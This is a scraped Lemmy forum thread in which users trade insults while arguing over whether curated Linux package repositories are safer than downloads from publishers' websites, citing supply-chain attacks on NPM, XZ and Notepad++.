theunknownmuncher@lemmy.world
on 11 Apr 08:10
collapse
Nah. Nothing is perfect of course, but normalizing executing software sourced from random, untrustworthy websites will always be objectively worse than curated repos.
It is hardly a random untrustworthy site, it is the software publishers site. There is no reason that a package repo canât suffer a similar attack.
Your confidence is entirely misplaced.
theunknownmuncher@lemmy.world
on 11 Apr 08:24
collapse
Oh I guess I should totally put my confidence in random sketchy websites. Great point!
It literally doesnât matter if itâs a publisher site or not, users canât tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
It isnât a random, sketchy or inherently untrustworthy site.
You shouldnât have any issue explaining how you would go about verifying that a software repo is trustworthy and how that differs from verifying a website.
Unless you donât actually know what youâre talking aboutâŚ
theunknownmuncher@lemmy.world
on 11 Apr 14:39
collapse
Iâll just paste what I already wrote in hopes that your reading comprehension benefits from reading it a second time:
It literally doesnât matter if itâs a publisher site or not, users canât tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
Again, louder this time, PACKAGE REPOSITORIES WILL ALWAYS BE OBJECTIVELY BETTER THAN RANDOM, UNTRUSTWORTHY WEBSITES.
I guess you should trust NPM though because its a package manager!
Youâre just encouraging people to blindly use and trust repos with no understanding of the pros or cons, and without understanding how you can verify and test software yourself to reduce risk. This is especially an easy conversaion when we talk closed source vs open source and you failed to even bring that up.
Repeating nonsense claims instead of actually considering the entirely reasonable question only highlights that youâre victim to the Dunning-Kruger effect.
You could have had a conversation and learned something from an actual cyber security professional and instead youâve acted like a clown.
theunknownmuncher@lemmy.world
on 11 Apr 17:21
collapse
theunknownmuncher@lemmy.world
on 11 Apr 17:34
collapse
Youâre so close to understanding. All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.
Please quote me where I claimed that software repositories are less vulnerable to supply chain attacks.
You were wrong about something, constructed a strawman argument, and are grasping at straws to save face.
theunknownmuncher@lemmy.world
on 11 Apr 18:37
collapse
Thatâs what I thought.
Are you done speed-running through as many logical fallacies as possible? Multiple strawman arguments, no true scottsman/appeal to authority, name calling/ad hominem. You wouldnât have to resort to these if you were just correct, like me.
Since you donât understand, you lowered the level of the conversation and now Iâm going to continue on that level because you get what you deserve.
Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance - in a field I am a professional in and have given reasoned and valid advice on.
In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo arenât malicious.
Given a real world example you simply ignore it âbut search resultsâ eat shit you moron. The legitimate website was popped so ârAnDoM wEbSiTeSâ arenât a factor or relevant.
JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit
theunknownmuncher@lemmy.world
on 11 Apr 19:28
collapse
Addressing logical fallacies elevates the discussion to place where it can actually be productive, not lowers it.
In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo arenât malicious.
Itâs not relevant because it applies to both random websites and code repositories equally. Again, please quote me where I claimed that code repositories are not susceptible to this.
Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance
Youâve demonstrated both of these, so it is just statement of fact. âyou moronâ this you?
JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit
Ironic, youâre the only one who has said those words. Another strawman. At no point have I supported just trusting anything.
theunknownmuncher@lemmy.world
on 11 Apr 23:16
nextcollapse
All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.
Doesnât change that this ^ is a fact you canât refute, so Iâm correct. Your entire argument is strawman arguing against claims that Iâve never made and name calling. Youâre basically just arguing with yourself. đ¤ˇ
Then you realize very popular software and their official website actually are a one man show. Nobody is perfect and those things tend to work for years without security in mind. At the time it were built, supply chain attack was not invented yet.
threaded - newest
Linux package repositories win again. Downloading random executable files from sketchy websites will always be stupid
EDIT: laughing so hard at the cope from windows users đ stay fully in denial and enjoy your self-installed viruses
Oh sweet summer childâŚ
Nah. Nothing is perfect of course, but normalizing executing software sourced from random, untrustworthy websites will always be objectively worse than curated repos.
It is hardly a random untrustworthy site, it is the software publishers site. There is no reason that a package repo canât suffer a similar attack.
Your confidence is entirely misplaced.
Oh I guess I should totally put my confidence in random sketchy websites. Great point!
It literally doesnât matter if itâs a publisher site or not, users canât tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
Go on then, explain to me how the well known software publishers website is random and sketchy.
I feel like youâve demonstrated very effectively how users lack the skills to understand what they are reading online đ
It isnât a random, sketchy or inherently untrustworthy site.
You shouldnât have any issue explaining how you would go about verifying that a software repo is trustworthy and how that differs from verifying a website.
Unless you donât actually know what youâre talking aboutâŚ
Iâll just paste what I already wrote in hopes that your reading comprehension benefits from reading it a second time:
It literally doesnât matter if itâs a publisher site or not, users canât tell the difference and it normalizes clicking links from a web search and running whatever software download the user sees first.
Again, louder this time, PACKAGE REPOSITORIES WILL ALWAYS BE OBJECTIVELY BETTER THAN RANDOM, UNTRUSTWORTHY WEBSITES.
Enjoy your ignorance and viruses
It doesnât matter if the software is delivered via a publishers website or via a package repository if the supply chain has been compromised.
Clearly youâre not aware of any recent cyber security news or youâd know that the NPM package manager has suffered numerous attacks: bleepingcomputer.com/âŚ/shai-hulud-malware-infectsâŚ
I guess you should trust NPM though because its a package manager!
Youâre just encouraging people to blindly use and trust repos with no understanding of the pros or cons, and without understanding how you can verify and test software yourself to reduce risk. This is especially an easy conversaion when we talk closed source vs open source and you failed to even bring that up.
Repeating nonsense claims instead of actually considering the entirely reasonable question only highlights that youâre victim to the Dunning-Kruger effect.
You could have had a conversation and learned something from an actual cyber security professional and instead youâve acted like a clown.
ItS nOt PeRfEcT sO iT cAnT bE bEtTeR
Cope.
hehehe seethe about it clown
Youâre so close to understanding. All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or do not apply to repos at all.
Please quote me where I claimed that software repositories are less vulnerable to supply chain attacks.
You were wrong about something, constructed a strawman argument, and are grasping at straws to save face.
rAnDoM wEbSiTeS
Thatâs what I thought.
Are you done speed-running through as many logical fallacies as possible? Multiple strawman arguments, no true scottsman/appeal to authority, name calling/ad hominem. You wouldnât have to resort to these if you were just correct, like me.
Since you donât understand, you lowered the level of the conversation and now Iâm going to continue on that level because you get what you deserve.
Ad hominem is a problem now when you started accusing me of lacking reading comprehension aka stupidity and then ignorance - in a field I am a professional in and have given reasoned and valid advice on.
In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo arenât malicious.
Given a real world example you simply ignore it âbut search resultsâ eat shit you moron. The legitimate website was popped so ârAnDoM wEbSiTeSâ arenât a factor or relevant.
JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit
Addressing logical fallacies elevates the discussion to place where it can actually be productive, not lowers it.
Itâs not relevant because it applies to both random websites and code repositories equally. Again, please quote me where I claimed that code repositories are not susceptible to this.
Youâve demonstrated both of these, so it is just statement of fact. âyou moronâ this you?
Ironic, youâre the only one who has said those words. Another strawman. At no point have I supported just trusting anything.
get ratiod fuckwit
Doesnât change that this ^ is a fact you canât refute, so Iâm correct. Your entire argument is strawman arguing against claims that Iâve never made and name calling. Youâre basically just arguing with yourself. đ¤ˇ
You canât tell after getting completely obliterated by downvotes and repeatedly rebutted that youâre the one in weeds? Clueless much
And yet my point was never refuted
<img alt="" src="https://lemmy.dbzer0.com/pictrs/image/7b834045-7eac-4d01-9dc6-e0e20613ef97.webp">
Not you, but some advice(?).
Tell me you didnât read the article without saying you didnât read the article.
XZ would like to have a word
Iâm glad I keep an archive of everything I download.
Deja Vu
Notepad++ have been there too
Then you realize very popular software and their official website actually are a one man show. Nobody is perfect and those things tend to work for years without security in mind. At the time it were built, supply chain attack was not invented yet.
I donât have evidence, but Iâm still gonna press X to doubt this claim.